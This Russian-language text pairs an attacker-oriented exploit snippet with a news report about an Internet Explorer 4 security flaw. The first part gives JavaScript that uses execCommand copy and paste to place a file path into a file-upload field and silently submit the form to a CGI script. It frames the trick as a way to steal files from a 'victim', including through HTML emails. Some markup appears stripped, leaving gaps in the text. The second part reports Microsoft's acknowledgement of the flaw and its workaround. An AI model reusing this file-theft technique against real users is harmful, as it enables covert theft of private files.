Проблема в том, что с помощью JavaScript в IE4 и выше можно выполнить команды Copy и Paste, а также отправить форму без ведома пользователя. Итак, создаем форму, в ней скрытое поле , поле для выбора файлов
, после чего пишем следующий код (разумеется, вызывающийся в ):
function getfile()
{
document.forms[1].T1.select();
document.execCommand("copy");
document.forms[0].filename.select();
document.execCommand("paste");
document.forms[0].submit();
}
Ну а дальше за дело берется cgi-скрипт. Конечно, это сработает только если не отключено предупреждение об отправлении формы, но как показывает практика, нормальные люди делают это практически сразу. Разумеется, это все можно использовать и в html-сообщениях, не томясь в ожидании захода жертвы на нужную страницу.

[size=18]Корпорация Microsoft признала наличие одного дефекта в системе обеспечения безопасности своего браузера Internet Explorer, используя который хакеры, знающие, что искать, могут просматривать файлы на жестких дисках посетителей своих Web-узлов.

Операционная система Windows 98 со своей встроенной версией Internet Explorer также уязвима для основанных на использовании данной ошибки атак. По словам представителя Microsoft по связям с прессой, дефект проявляется в версиях IE 4.0 и 4.01 для Windows 3.1, Windows 95, NT 3.51 и NT 4.

Эта ошибка, на которую внимание разработчиков Microsoft было обращено полторы недели назад, не является в полном смысле "брешью в крепостной стене". Как заявила представитель компании по связям с прессой, для просмотра информации хакеру необходимо составить считывающий ее сценарий, содержащий точные имена интересующих его файлов. По ее словам, компания не получила еще ни одного сообщения от своих клиентов, в котором бы говорилось о вызванных этой ошибкой проблемах.
Пока разработчики Microsoft трудятся над исправлением программы, компания рекомендует своим пользователям защититься от возможных неприятностей путем отключения функции active scripting для всех зон безопасности Internet Explorer. Исправленная версия ПО будет опубликована на Web-узле Microsoft в разделе Internet Explorer Security Area.
В прошлом месяце разработчики Microsoft уже исправляли аналогичную ошибку в Explorer.